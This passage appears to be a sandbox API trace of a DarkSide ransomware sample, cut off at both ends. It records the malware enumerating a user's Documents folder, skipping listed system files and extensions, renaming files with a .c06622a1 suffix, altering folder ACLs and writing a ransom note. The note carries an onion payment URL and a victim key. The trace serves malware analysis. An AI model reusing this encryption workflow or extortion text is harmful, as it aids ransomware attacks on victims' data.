FWw405aMO.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n2n0 fww405amo.pptx.c06622a1"), dwFlags=0x8) returned 1 [0157.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\N2N0 FWw405aMO.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n2n0 fww405amo.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x19c [0157.879] CreateIoCompletionPort (FileHandle=0x19c, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0157.879] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0157.883] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x27f7e12e [0157.883] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5572305a [0157.883] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x763d9197 [0157.883] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x15c32181 [0157.884] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x74a133b3 [0157.884] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x76ee94fe [0157.884] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ecfbf65 [0157.884] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3bf4bbf1 [0157.887] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x105e4d93 [0157.887] RtlComputeCrc32 (PartialCrc=0x4d93, Buffer=0x710094, Length=0x80) returned 0x6800a008 [0157.887] RtlComputeCrc32 (PartialCrc=0xa008, Buffer=0x710094, Length=0x80) returned 0xc07cbff8 [0157.887] RtlComputeCrc32 (PartialCrc=0xbff8, Buffer=0x710094, Length=0x80) returned 0x40d75aea [0157.887] RtlComputeCrc32 (PartialCrc=0x5aea, Buffer=0x710094, Length=0x80) returned 0x5fc770b7 [0157.887] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0157.887] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.888] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.889] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bdf5510, ftCreationTime.dwHighDateTime=0x1d55c5d, ftLastAccessTime.dwLowDateTime=0x8f888280, ftLastAccessTime.dwHighDateTime=0x1d581f0, ftLastWriteTime.dwLowDateTime=0x8f888280, ftLastWriteTime.dwHighDateTime=0x1d581f0, nFileSizeHigh=0x0, nFileSizeLow=0x15b86, dwReserved0=0x0, dwReserved1=0x0, cFileName="nd5TBS.xlsx", cAlternateFileName="ND5TBS~1.XLS")) returned 1 [0157.889] _wcsicmp (_Str1="nd5TBS.xlsx", _Str2="README.c06622a1.TXT") returned -4 [0157.889] wcsstr (_Str="nd5TBS.xlsx", _SubStr="README") returned 0x0 [0157.889] _wcsicmp (_Str1="autorun.inf", _Str2="nd5TBS.xlsx") returned -13 [0157.889] wcslen (_String="autorun.inf") returned 0xb [0157.889] _wcsicmp (_Str1="boot.ini", _Str2="nd5TBS.xlsx") returned -12 [0157.889] wcslen (_String="boot.ini") returned 0x8 [0157.889] _wcsicmp (_Str1="bootfont.bin", _Str2="nd5TBS.xlsx") returned -12 [0157.889] wcslen (_String="bootfont.bin") returned 0xc [0157.889] _wcsicmp (_Str1="bootsect.bak", _Str2="nd5TBS.xlsx") returned -12 [0157.889] wcslen (_String="bootsect.bak") returned 0xc [0157.889] _wcsicmp (_Str1="desktop.ini", _Str2="nd5TBS.xlsx") returned -10 [0157.889] wcslen (_String="desktop.ini") returned 0xb [0157.890] _wcsicmp (_Str1="iconcache.db", _Str2="nd5TBS.xlsx") returned -5 [0157.890] wcslen (_String="iconcache.db") returned 0xc [0157.890] _wcsicmp (_Str1="ntldr", _Str2="nd5TBS.xlsx") returned 16 [0157.890] wcslen (_String="ntldr") returned 0x5 [0157.890] _wcsicmp (_Str1="ntuser.dat", _Str2="nd5TBS.xlsx") returned 16 [0157.890] wcslen (_String="ntuser.dat") returned 0xa [0157.890] _wcsicmp (_Str1="ntuser.dat.log", _Str2="nd5TBS.xlsx") returned 16 [0157.890] wcslen (_String="ntuser.dat.log") returned 0xe [0157.890] _wcsicmp (_Str1="ntuser.ini", _Str2="nd5TBS.xlsx") returned 16 [0157.890] wcslen (_String="ntuser.ini") returned 0xa [0157.890] _wcsicmp (_Str1="thumbs.db", _Str2="nd5TBS.xlsx") returned 6 [0157.890] wcslen (_String="thumbs.db") returned 0x9 [0157.890] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0157.890] wcslen (_String="386") returned 0x3 [0157.890] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0157.890] wcslen (_String="adv") returned 0x3 [0157.890] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0157.890] wcslen (_String="ani") returned 0x3 [0157.890] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0157.890] wcslen (_String="bat") returned 0x3 [0157.890] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0157.890] wcslen (_String="bin") returned 0x3 [0157.890] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0157.890] wcslen (_String="cab") returned 0x3 [0157.890] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0157.890] wcslen (_String="cmd") returned 0x3 [0157.890] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0157.890] wcslen (_String="com") returned 0x3 [0157.890] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0157.890] wcslen (_String="cpl") returned 0x3 [0157.890] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0157.890] wcslen (_String="cur") returned 0x3 [0157.890] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0157.890] wcslen (_String="deskthemepack") returned 0xd [0157.890] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0157.891] wcslen (_String="diagcab") returned 0x7 [0157.891] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0157.891] wcslen (_String="diagcfg") returned 0x7 [0157.891] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0157.891] wcslen (_String="diagpkg") returned 0x7 [0157.891] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0157.891] wcslen (_String="dll") returned 0x3 [0157.891] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0157.891] wcslen (_String="drv") returned 0x3 [0157.891] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0157.891] wcslen (_String="exe") returned 0x3 [0157.891] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0157.891] wcslen (_String="hlp") returned 0x3 [0157.891] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0157.891] wcslen (_String="icl") returned 0x3 [0157.891] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0157.891] wcslen (_String="icns") returned 0x4 [0157.891] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0157.891] wcslen (_String="ico") returned 0x3 [0157.891] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0157.891] wcslen (_String="ics") returned 0x3 [0157.891] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0157.891] wcslen (_String="idx") returned 0x3 [0157.891] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0157.891] wcslen (_String="ldf") returned 0x3 [0157.891] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0157.891] wcslen (_String="lnk") returned 0x3 [0157.891] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0157.891] wcslen (_String="mod") returned 0x3 [0157.891] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0157.891] wcslen (_String="mpa") returned 0x3 [0157.891] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0157.891] wcslen (_String="msc") returned 0x3 [0157.892] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0157.892] wcslen (_String="msp") returned 0x3 [0157.892] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0157.892] wcslen (_String="msstyles") returned 0x8 [0157.892] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0157.892] wcslen (_String="msu") returned 0x3 [0157.892] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0157.892] wcslen (_String="nls") returned 0x3 [0157.892] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0157.892] wcslen (_String="nomedia") returned 0x7 [0157.892] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0157.892] wcslen (_String="ocx") returned 0x3 [0157.892] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0157.892] wcslen (_String="prf") returned 0x3 [0157.892] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0157.892] wcslen (_String="ps1") returned 0x3 [0157.892] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0157.892] wcslen (_String="rom") returned 0x3 [0157.892] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0157.892] wcslen (_String="rtp") returned 0x3 [0157.892] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0157.892] wcslen (_String="scr") returned 0x3 [0157.892] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0157.892] wcslen (_String="shs") returned 0x3 [0157.892] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0157.892] wcslen (_String="spl") returned 0x3 [0157.892] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0157.892] wcslen (_String="sys") returned 0x3 [0157.892] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0157.892] wcslen (_String="theme") returned 0x5 [0157.892] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0157.892] wcslen (_String="themepack") returned 0x9 [0157.892] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0157.892] wcslen (_String="wpx") returned 0x3 [0157.892] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0157.892] wcslen (_String="lock") returned 0x4 [0157.893] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0157.893] wcslen (_String="key") returned 0x3 [0157.893] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0157.893] wcslen (_String="hta") returned 0x3 [0157.893] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0157.893] wcslen (_String="msi") returned 0x3 [0157.893] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0157.893] wcslen (_String="pdb") returned 0x3 [0157.893] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0157.893] wcslen (_String="sqlite") returned 0x6 [0157.893] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.893] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.893] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.893] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.893] wcscpy (in: _Dest=0x32100a0, _Source="nd5TBS.xlsx" | out: _Dest="nd5TBS.xlsx") returned="nd5TBS.xlsx" [0157.893] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nd5TBS.xlsx", dwFileAttributes=0x80) returned 1 [0157.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nd5TBS.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nd5tbs.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0157.893] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.894] ReadFile (in: hFile=0x1c0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.894] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x67c53f50 [0157.894] RtlComputeCrc32 (PartialCrc=0x3f50, Buffer=0x32ec24, Length=0x80) returned 0xf07c5cea [0157.894] RtlComputeCrc32 (PartialCrc=0x5cea, Buffer=0x32ec24, Length=0x80) returned 0xbe26cdf4 [0157.894] RtlComputeCrc32 (PartialCrc=0xcdf4, Buffer=0x32ec24, Length=0x80) returned 0x2c7a1855 [0157.894] RtlComputeCrc32 (PartialCrc=0x1855, Buffer=0x32ec24, Length=0x80) returned 0x223c7875 [0157.894] CloseHandle (hObject=0x1c0) returned 1 [0157.895] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.895] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nd5TBS.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nd5TBS.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nd5TBS.xlsx" [0157.895] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nd5TBS.xlsx") returned 0x37 [0157.895] wcscpy (in: _Dest=0x32200be, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.895] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nd5TBS.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nd5tbs.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nd5TBS.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nd5tbs.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0157.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nd5TBS.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nd5tbs.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c0 [0157.897] CreateIoCompletionPort (FileHandle=0x1c0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0157.898] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0157.905] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xeda998f [0157.905] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5e393a43 [0157.905] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x504045e0 [0157.905] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2e93d513 [0157.905] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7eee40bf [0157.905] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x423f8720 [0157.905] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3451880f [0157.905] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x109a6e68 [0157.908] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x8f553a64 [0157.908] RtlComputeCrc32 (PartialCrc=0x3a64, Buffer=0x2690094, Length=0x80) returned 0x2977bcfa [0157.908] RtlComputeCrc32 (PartialCrc=0xbcfa, Buffer=0x2690094, Length=0x80) returned 0x4d6608a1 [0157.908] RtlComputeCrc32 (PartialCrc=0x8a1, Buffer=0x2690094, Length=0x80) returned 0xe1da661 [0157.908] RtlComputeCrc32 (PartialCrc=0xa661, Buffer=0x2690094, Length=0x80) returned 0xf7c6bdd7 [0157.908] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0157.908] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.910] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.911] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0157.911] _wcsicmp (_Str1="$recycle.bin", _Str2="Outlook Files") returned -75 [0157.911] wcslen (_String="$recycle.bin") returned 0xc [0157.911] _wcsicmp (_Str1="config.msi", _Str2="Outlook Files") returned -12 [0157.911] wcslen (_String="config.msi") returned 0xa [0157.911] _wcsicmp (_Str1="$windows.~bt", _Str2="Outlook Files") returned -75 [0157.911] wcslen (_String="$windows.~bt") returned 0xc [0157.911] _wcsicmp (_Str1="$windows.~ws", _Str2="Outlook Files") returned -75 [0157.911] wcslen (_String="$windows.~ws") returned 0xc [0157.911] _wcsicmp (_Str1="windows", _Str2="Outlook Files") returned 8 [0157.911] wcslen (_String="windows") returned 0x7 [0157.911] _wcsicmp (_Str1="appdata", _Str2="Outlook Files") returned -14 [0157.911] wcslen (_String="appdata") returned 0x7 [0157.911] _wcsicmp (_Str1="application data", _Str2="Outlook Files") returned -14 [0157.911] wcslen (_String="application data") returned 0x10 [0157.911] _wcsicmp (_Str1="boot", _Str2="Outlook Files") returned -13 [0157.911] wcslen (_String="boot") returned 0x4 [0157.911] _wcsicmp (_Str1="google", _Str2="Outlook Files") returned -8 [0157.911] wcslen (_String="google") returned 0x6 [0157.911] _wcsicmp (_Str1="mozilla", _Str2="Outlook Files") returned -2 [0157.911] wcslen (_String="mozilla") returned 0x7 [0157.911] _wcsicmp (_Str1="program files", _Str2="Outlook Files") returned 1 [0157.911] wcslen (_String="program files") returned 0xd [0157.911] _wcsicmp (_Str1="program files (x86)", _Str2="Outlook Files") returned 1 [0157.911] wcslen (_String="program files (x86)") returned 0x13 [0157.911] _wcsicmp (_Str1="programdata", _Str2="Outlook Files") returned 1 [0157.911] wcslen (_String="programdata") returned 0xb [0157.911] _wcsicmp (_Str1="system volume information", _Str2="Outlook Files") returned 4 [0157.911] wcslen (_String="system volume information") returned 0x19 [0157.911] _wcsicmp (_Str1="tor browser", _Str2="Outlook Files") returned 5 [0157.912] wcslen (_String="tor browser") returned 0xb [0157.912] _wcsicmp (_Str1="windows.old", _Str2="Outlook Files") returned 8 [0157.912] wcslen (_String="windows.old") returned 0xb [0157.912] _wcsicmp (_Str1="intel", _Str2="Outlook Files") returned -6 [0157.912] wcslen (_String="intel") returned 0x5 [0157.912] _wcsicmp (_Str1="msocache", _Str2="Outlook Files") returned -2 [0157.912] wcslen (_String="msocache") returned 0x8 [0157.912] _wcsicmp (_Str1="perflogs", _Str2="Outlook Files") returned 1 [0157.912] wcslen (_String="perflogs") returned 0x8 [0157.912] _wcsicmp (_Str1="x64dbg", _Str2="Outlook Files") returned 9 [0157.912] wcslen (_String="x64dbg") returned 0x6 [0157.912] _wcsicmp (_Str1="public", _Str2="Outlook Files") returned 1 [0157.912] wcslen (_String="public") returned 0x6 [0157.912] _wcsicmp (_Str1="all users", _Str2="Outlook Files") returned -14 [0157.912] wcslen (_String="all users") returned 0x9 [0157.912] _wcsicmp (_Str1="default", _Str2="Outlook Files") returned -11 [0157.912] wcslen (_String="default") returned 0x7 [0157.912] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" [0157.912] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned 0x2d [0157.912] wcscpy (in: _Dest=0x208e78, _Source="Outlook Files" | out: _Dest="Outlook Files") returned="Outlook Files" [0157.912] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.912] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.913] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0157.913] GetNamedSecurityInfoW () returned 0x0 [0157.913] SetEntriesInAclW () returned 0x0 [0157.913] SetNamedSecurityInfoW () returned 0x0 [0157.915] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x17c4f0) returned 1 [0157.915] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0157.915] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files")) returned 1 [0157.915] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0157.915] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0157.915] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0157.916] CloseHandle (hObject=0x1a4) returned 1 [0157.917] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0157.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files")) returned 0x10 [0157.917] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="" [0157.917] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 0x3a [0157.917] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0157.917] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8bd3a200, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8bd3a200, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.917] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bd3a200, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8bd3a200, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8bd3a200, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0157.917] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0157.918] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0157.918] _wcsicmp (_Str1="voeimd@djhreuu.uhd.pst", _Str2="README.c06622a1.TXT") returned 